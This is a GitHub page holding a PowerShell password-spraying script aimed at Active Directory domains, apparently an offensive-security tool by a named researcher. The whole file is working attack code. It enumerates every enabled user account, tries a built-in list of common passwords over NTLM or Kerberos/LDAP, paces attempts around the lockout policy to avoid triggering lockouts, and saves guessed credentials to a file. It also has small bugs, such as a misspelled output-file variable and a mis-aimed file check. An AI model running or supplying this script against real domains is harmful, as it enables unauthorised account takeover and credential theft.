Tools/Invoke-PasswordSpray.ps1 at main · PyroTek3/Tools · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
<#
.SYNOPSIS
PowerShell based password spray.

.DESCRIPTION
This script performs a password spray atack against enabled users in a specific domain.

.PARAMETER Domain (Required)
Domain Name of your AD

.PARAMETER AuthType (Required)
Authentication type used for password spray.
Either NTLM or Kerberos

.PARAMETER AutoTune
Option when selected builds in delays to avoid locking out user accounts

.PARAMETER DomainController
Provides the name of a target domain controller

.PARAMETER OnlyShowSuccess
Option when selected only provides output when the correct password is guessed.

.PARAMETER PasswordFile
Option to provide a list of passwords (one per line)

.PARAMETER PasswordSprayResultsFile
Option to specify a comma delimited output file for correctly guessed username & password


.EXAMPLE
PS>.\Invoke-PasswordSpray.ps1 -Domain 'trd.com' -AuthType Kerberos

.NOTES
AUTHOR: Sean Metcalf
AUTHOR EMAIL: sean.metcalf@trustedsec.com
COPYRIGHT: 2025
WEBSITE: https://ADSecurity.org

This script requires the following:
 * PowerShell 5.0 (minimum)
 * Windows 10/2016
 * Active Directory PowerShell Module
If the above requirements are not met, results will be inconsistent.
This script is provided as-is, without support.
#>

Param
 (
    [Parameter(Mandatory=$true)]$Domain,
    [Parameter(Mandatory=$true)][ValidateSet("NTLM", "Kerberos")]$AuthType, #Kerberos is way faster!
    [switch]$AutoTune = $True,
    [string]$DomainController,
    [switch]$OnlyShowSuccess,
    [string]$PasswordFile,
    [string]$PasswordSprayResultsFile
 )

IF ($DomainController)
 {
    $DomainDC = $DomainController
    $RemotePath = "\\$DomainController\SYSVOL"
 }
ELSE
 {
    $DomainDCInfo = Get-ADDomainController -Discover -DomainName $Domain
    $DomainDC = $DomainDCInfo.Name
    [array]$DomainInfo = Get-ADDomain -Server $DomainDC
    $RemotePath = "\\$($DomainInfo.DNSRoot)\SYSVOL"
 }

 [array]$DomainInfo = Get-ADDomain -Server $DomainDC
 $DomainInfoDNS = $DomainInfo.DNSRoot

IF ($AutoTune -eq $True)
 {
    $DomainPasswordPolicy = Get-ADDefaultDomainPasswordPolicy -Server $DomainDC
     Write-Host "Lockout Threshold is $($DomainPasswordPolicy.LockoutThreshold) with an Observation window of $($DomainPasswordPolicy.LockoutObservationWindow.TotalMinutes) minutes"
    IF ($DomainPasswordPolicy.LockoutThreshold -gt 0)
     {
        $WaitTimeInMinutes = ($DomainPasswordPolicy.LockoutObservationWindow.TotalMinutes / $DomainPasswordPolicy.LockoutThreshold) + 1
     }
    ELSE
     { $WaitTimeInMinutes = 1 }
 }

IF (!$PasswordFile)
 { [array]$PasswordArray = @('Password99!','Password1234','P@ssw0rd1','1234Password','Password123!','Qwerty!','Zxcvbnm!','Qwertyuiop!','1234asdf!','qwer1234!','ThisIsASecurePassword!','WilECoyote!','WrongPassword!' ) }
IF ($PasswordFile)
 { [array]$PasswordArray = Import-CSV $PasswordFile }

[array]$UserAccountArray = Get-ADUser -Filter 'Enabled  -eq $True' -Server $DomainDC
$UserAccountArray = $UserAccountArray | Sort-Object SamAccountName

IF ($PasswordFile)
 {
    $PasswordFilePathCheck = Test-Path $PasswordFile
    IF ($PasswordFilePathCheck -eq $True)
     {
        $PWSprayUserFileCheck = Read-Host "Password Spray Output file exists ($PasswordSprayResultsFile). Overwrite? (Y/N)?"
        IF ( ($PWSprayUserFileCheck -eq 'N') -OR ($PWSprayUserFileCheck -eq 'No') )
         {
            $PWSprayFileArray = $PasswordSprayResultsFile -Split '\\'
            $PWSprayFileNameArrayCount = $PWSprayFileArray.count -1
            $PWSprayFileNameArrayText = ($PWSprayFileArray[$PWSprayFileNameArrayCount] -split '\.')[0]
            $PWSprayFileNameText = $PWSprayFileNameArrayText + '-' + $(Get-Random -min 100 -max 999)
            $PWSprayFileNewArrayUpdated = $PasswordSprayResultsFile.Replace($PWSprayFileNameArrayText, $PWSprayFileNameText)
            $PasswordSprayResultsFile = $PWSprayFileNewArrayUpdated
         }
     }
 }

"Password Spray Results for $Domain using $AuthType " | Out-File  $PassowrdSprayResultsFile

Write-Host "Password Spraying the domain $Domain using $AuthType against $($UserAccountArray.count) users using $($PasswordArray.Count) passwords..."
ForEach ($PasswordArrayItem in $PasswordArray)
 {
    # Write-host "Password spraying $($UserAccountArray.count) users with the password $PasswordArrayItem"
    ForEach ($UserAccountArrayItem in $UserAccountArray)
     {
        $username = $DomainInfo.NetBIOSName + '\' + $UserAccountArrayItem.SamAccountName

        If ($OnlyShowSuccess -ne $True)
         { Write-Host "Password spraying username $($UserAccountArrayItem.SamAccountName) with password $PasswordArrayItem" }

        IF ($AuthType -eq 'NTLM')
          {
            TRY
             {
                $outputSMB = @()
                $password = ConvertTo-SecureString $PasswordArrayItem -AsPlainText -Force
                $cred = New-Object System.Management.Automation.PSCredential($username, $password)
                $outputSMB = New-SmbMapping -RemotePath $RemotePath -Credential $cred -ErrorAction Stop
                Remove-SmbMapping -RemotePath $RemotePath -Force
                IF ($outputSMB.Status -eq 'Ok')
                 {
                    write-host "User $($UserAccountArrayItem.SamAccountName) has the password $PasswordArrayItem" -ForegroundColor Cyan
                    $($UserAccountArrayItem.SamAccountName) + ',' + $PasswordArrayItem | Out-File  $PasswordSprayResultsFile -Append
                 }
             }
            CATCH
             { write-verbose "Password is incorrect" }
          }

        IF ($AuthType -eq 'Kerberos')
          {
            TRY
             {
                $outputDSDE = @()
                $outputDSDE = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$($DomainInfo.DistinguishedName)",$username,$PasswordArrayItem)
                IF ($outputDSDE.distinguishedName)
                 {
                    write-host "User $($UserAccountArrayItem.SamAccountName) has the password $PasswordArrayItem" -ForegroundColor Cyan
                    $($UserAccountArrayItem.SamAccountName) + ',' + $PasswordArrayItem | Out-File  $PasswordSprayResultsFile -Append
                 }
             }
            CATCH
             { write-verbose "Password is incorrect" }
          }
     }
    IF ($AutoTune -eq $True)
     {
        Write-Host "Pausing $WaitTimeInMinutes minutes..."
        Start-Sleep -Seconds $($WaitTimeInMinutes * 60)
     }
 }